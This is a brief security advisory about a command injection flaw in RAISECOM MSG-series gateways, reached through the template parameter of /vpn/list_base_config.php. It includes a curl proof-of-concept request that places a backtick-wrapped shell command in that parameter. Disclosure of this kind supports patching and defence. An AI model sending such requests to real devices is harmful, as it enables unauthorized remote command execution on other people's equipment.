A command injection vulnerability has been identified in the RAISECOM Gateway devices, affecting models MSG1200, MSG2100E, MSG2200, and MSG2300. This vulnerability allows remote attackers to execute arbitrary commands on the system via the web interface. The issue resides in the list_base_config.php script, specifically via the template parameter, affecting over 25,112 devices on the Internet.
URI: /vpn/list_base_config.php
Description: the list_base_config.php is a web-based interface component of RAISECOM Gateway devices used for managing VPN configurations. The identified vulnerability arises due to improper handling of the template parameter in this script. This parameter can be exploited to execute arbitrary commands on the device's operating system due to insufficient input sanitization.
CWE-77: Command Injection
Here is an example of how the vulnerability can be exploited using a curl command:
curl 'http://<TARGET_IP>/vpn/list_base_config.php?type=mod&parts=base_config&template=`<INJECTED_SHELL_COMMAND>`' \\
-H 'Accept: */*' \\
-H 'Accept-Encoding: gzip, deflate' \\
-H 'Connection: keep-alive'
In this example, the curl command sends a malicious HTTP GET request to the list_base_config.php script. The request utilizes the template parameter to execute a command.
